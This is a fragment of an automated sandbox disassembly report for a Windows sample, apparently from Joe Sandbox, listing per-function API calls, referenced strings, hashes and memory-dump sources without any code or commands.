                                                      • Instruction ID: 2a4b9e6b3618ab48e7e9c0aaa8b9cd7a1f556b7e0fe2294b8a27118092a03531
                                                      • Opcode Fuzzy Hash: 41c876d01532474c65fe2bd678b38e02ae3497a50cd94dbb1678c1d9e49c5de0
                                                      • Instruction Fuzzy Hash: FED0A730B453202BCF615BF57C88BCB6E855B08FA1B148132B505F21E4CA78CF848A9C
                                                      APIs
                                                      • strlen.MSVCRT ref: 00405C21
                                                      • memset.MSVCRT ref: 00405C2E
                                                        • Part of subcall function 004025DE: memcpy.MSVCRT ref: 004025EC
                                                        • Part of subcall function 004025DE: atoi.MSVCRT ref: 004025FA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: atoimemcpymemsetstrlen
                                                      • String ID: A]@$now
                                                      • API String ID: 1328007670-3605966695
                                                      • Opcode ID: 42a9299de6da293a071204fe9f5495f6b97a89703d110dd10f86499890e3a9cb
                                                      • Instruction ID: 6a334ab0d537ce91b15ee429e28e39a7e166302a264b8f683cfcc12fbaba6d74
                                                      • Opcode Fuzzy Hash: 42a9299de6da293a071204fe9f5495f6b97a89703d110dd10f86499890e3a9cb
                                                      • Instruction Fuzzy Hash: 7911A7B19047087AF721ABB68C9BF9AB358EF01318F04843BE506AF1D2FAB89550475D
                                                      APIs
                                                      • strlen.MSVCRT ref: 00402E94
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00402EB4
                                                        • Part of subcall function 00402269: malloc.MSVCRT ref: 00402285
                                                        • Part of subcall function 00402269: memcpy.MSVCRT ref: 0040229D
                                                        • Part of subcall function 00402269: ??3@YAXPAX@Z.MSVCRT ref: 004022A6
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00402ED7
                                                      • memcpy.MSVCRT ref: 00402EF7
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??3@$memcpy$mallocstrlen
                                                      • String ID:
                                                      • API String ID: 1171893557-0
                                                      • Opcode ID: 63d33b09fd893f1cfb06e45a28eb3787ac4f0da315d261c0ef70105015b04338
                                                      • Instruction ID: 0c798aaa5ec04bef33e4aa6798287ef591deafa1637401394e430fd9616f19b5
                                                      • Opcode Fuzzy Hash: 63d33b09fd893f1cfb06e45a28eb3787ac4f0da315d261c0ef70105015b04338
                                                      • Instruction Fuzzy Hash: 2B11CD72200604DFD730EF28D984D9BB7F5EF443247208A2EF452AB6D2C7B5B9458B94
                                                      APIs
                                                        • Part of subcall function 0040299D: memset.MSVCRT ref: 004029D3
                                                        • Part of subcall function 0040299D: strtol.MSVCRT ref: 004029FC
                                                      • GetWindowRect.USER32(?,?), ref: 00407487
                                                      • GetParent.USER32(?), ref: 004074A2
                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004074B4
                                                      • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000003), ref: 004074D6
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$ParentPointsRectmemsetstrtol
                                                      • String ID:
                                                      • API String ID: 1631573572-0
                                                      • Opcode ID: 6aa8840c278283521ecc3d305f0bbf4977436e1c8acd2370e9c58d12afbf30aa
                                                      • Instruction ID: fc3d602424b4e27ac52b3c0d68fc7d12cc6e32ecc0d8d0e89a6f2e50a12961af
                                                      • Opcode Fuzzy Hash: 6aa8840c278283521ecc3d305f0bbf4977436e1c8acd2370e9c58d12afbf30aa
                                                      • Instruction Fuzzy Hash: AB112972D00129AFDB00CFE8DC84AEEBB75FB48314F158529EA16F3250D774A905CB55
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@??3@memcpymemset
                                                      • String ID:
                                                      • API String ID: 1865533344-0
                                                      • Opcode ID: 4536d56c826f533afacf84f13237e722b6053a0f2299101c2619fe349b857098
                                                      • Instruction ID: 04cfb5f477dae2442497efff473a6c05d1395866994748a14405027bf6395a16
                                                      • Opcode Fuzzy Hash: 4536d56c826f533afacf84f13237e722b6053a0f2299101c2619fe349b857098
                                                      • Instruction Fuzzy Hash: A21198B16002009BD728DF19DC51A96BFA9EB8C358B02C03EE409C73A5DB74D941CB18
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@??3@strlen
                                                      • String ID:
                                                      • API String ID: 3054257972-0
                                                      • Opcode ID: 63ce2b80823d69de86dbf7dcb5ab19004797d4edf83c29046b8da4a46f5ddad8
                                                      • Instruction ID: 9fbbedca34cb89c55de691502d25219f126107378c52c5549980c5d736f617c7
                                                      • Opcode Fuzzy Hash: 63ce2b80823d69de86dbf7dcb5ab19004797d4edf83c29046b8da4a46f5ddad8
                                                      • Instruction Fuzzy Hash: A8010C37D04248AACB11ABA645057DFBF749F55354F1080BBD881B72C2C1B48681C759
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,0040B107,?,?,00000001,?,system,?,boot,?,disabled,?,manual), ref: 0040EFF2
                                                      • GetLastError.KERNEL32(?,?,?,0040B107,?,?,00000001,?,system,?,boot,?,disabled,?,manual), ref: 0040F003
                                                      • GetLastError.KERNEL32(?,?,0040B107,?,?,00000001,?,system,?,boot,?,disabled,?,manual,?,auto), ref: 0040F015
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: ServicesActive
                                                      • API String ID: 1452528299-3071072050
                                                      • Opcode ID: b15d5e498472cbef90358db768449c7520b3614438626f40c96d2ca4daaed0b2
                                                      • Instruction ID: bd5a18f3ea91b2463d85ffaae232768501679098d3d51895b7bdacced177ad12
                                                      • Opcode Fuzzy Hash: b15d5e498472cbef90358db768449c7520b3614438626f40c96d2ca4daaed0b2
                                                      • Instruction Fuzzy Hash: 29F0C831204221BBC7312B70AC4C9AF7EA8EB8DB71B254675FD02E22E1D7388C409A5D
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Global$SizeWirememset
                                                      • String ID:
                                                      • API String ID: 369488093-0
                                                      • Opcode ID: 1142e2692c5fd429387c560be0853352a5916a656c27206eab57bacf9329872c
                                                      • Instruction ID: ef26b8644eb935f89815b46d1f0f2fd43649211328a67e015921de48fb633e31
                                                      • Opcode Fuzzy Hash: 1142e2692c5fd429387c560be0853352a5916a656c27206eab57bacf9329872c
                                                      • Instruction Fuzzy Hash: A301A2319002009BCB209B54CD4589F7BFCEF89710724483AE986E3260E335EC518B58
                                                      APIs
                                                      • GetFileAttributesA.KERNEL32(00000104,00000000,00000000,?,00405D87,?,00000000,00000000,00000000,?,?,00405F16,?,?,?,00000000), ref: 00402894
                                                      • CreateFileA.KERNEL32(00000104,40000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,00405D87,?,00000000,00000000,00000000,?), ref: 004028B2
                                                      • SetFileTime.KERNEL32(00000000,?,00000000,?,?,00405D87,?,00000000,00000000,00000000,?,?,00405F16,?,?,?), ref: 004028C9
                                                      • CloseHandle.KERNEL32(00000000,?,00405D87,?,00000000,00000000,00000000,?,?,00405F16,?,?,?,00000000,?,00000104), ref: 004028D2
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$AttributesCloseCreateHandleTime
                                                      • String ID:
                                                      • API String ID: 1550419386-0
                                                      • Opcode ID: 4a2ed23af5eb52c2952b978eec6956265176091a0985638fd30eafd8a25ac7df
                                                      • Instruction ID: fb2271233b795beaa095415a7d1a1cea53f4a84663435d116e0947f59f6f6a06
                                                      • Opcode Fuzzy Hash: 4a2ed23af5eb52c2952b978eec6956265176091a0985638fd30eafd8a25ac7df
                                                      • Instruction Fuzzy Hash: A8F06D36500114BBDB211FA6EC0CFCB7E69EB8A761F048131FF14A21E0C671495287D4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFile_mbscpystrrchr
                                                      • String ID:
                                                      • API String ID: 3127759436-0
                                                      • Opcode ID: 77cffd47af9b24f5f7b20cdd958b7e8780a3f06abc67eec3af586855d15e6b2f
                                                      • Instruction ID: ec200365e1f78e726b41df2e080492369fe3323070ae8e31981c0b27ba37af15
                                                      • Opcode Fuzzy Hash: 77cffd47af9b24f5f7b20cdd958b7e8780a3f06abc67eec3af586855d15e6b2f
                                                      • Instruction Fuzzy Hash: FFF0A731500209AADF10AB74DC4ABCA7BA85B00308F0045A1B688E50E2EFF4D9C58B95
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??3@InfoMonitor
                                                      • String ID: H
                                                      • API String ID: 3476259087-2852464175
                                                      • Opcode ID: f4d594e0de1939bc7e96b1478809dce165cc8ff3016af223115e7e733f4ed527
                                                      • Instruction ID: f390d2729d7f761660da0b7f783c23454d0381a1e6576f1d9d8f1ee5a8dd6c8d
                                                      • Opcode Fuzzy Hash: f4d594e0de1939bc7e96b1478809dce165cc8ff3016af223115e7e733f4ed527
                                                      • Instruction Fuzzy Hash: 9101D8B35002089FDB10DF65D4809CABBFDEF04724B10C42FE955A76C0D774A9458F55
                                                      APIs
                                                        • Part of subcall function 00401A73: FreeLibrary.KERNEL32(?,00401AE5), ref: 00401A7B
                                                      • GetProcAddress.KERNEL32(?,CreateAssemblyCache), ref: 00401A5F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeLibraryProc
                                                      • String ID: CreateAssemblyCache$fusion.dll
                                                      • API String ID: 3013587201-1145749632
                                                      • Opcode ID: 8d7c764f10267864cd2eab76513a79911b60bf5455297c3f3f243bf68f17b784
                                                      • Instruction ID: c0df7c1beb3857032a41c62af633e97de19dc5a42cb3f2816a153b0f5d3f0e06
                                                      • Opcode Fuzzy Hash: 8d7c764f10267864cd2eab76513a79911b60bf5455297c3f3f243bf68f17b784
                                                      • Instruction Fuzzy Hash: CCE02635701300AED7209BB1CD01F8773E4EF44B60F00883BE542E60A0C2B4A8408B48
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(netapi32.dll,00408258,NetApiBufferFree,?,?,000000FF,?,?,000010FE), ref: 0040DAF0
                                                      • GetProcAddress.KERNEL32(?,000010FE), ref: 0040DB04
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: netapi32.dll
                                                      • API String ID: 2574300362-1182877548
                                                      • Opcode ID: 867d5529b54e4cf9d1ce1f0f285f1858dba5a66bb2bd9fe02869aab271ed4f6f
                                                      • Instruction ID: a407341ad5a9efb6d2d65c33acf3046451f78160bbe66394af3058fa4fbcd859
                                                      • Opcode Fuzzy Hash: 867d5529b54e4cf9d1ce1f0f285f1858dba5a66bb2bd9fe02869aab271ed4f6f
                                                      • Instruction Fuzzy Hash: F6D09E74B452019AC7009FF1AC48A577EA8AB15742712C436B105E1560DB35D994EB1D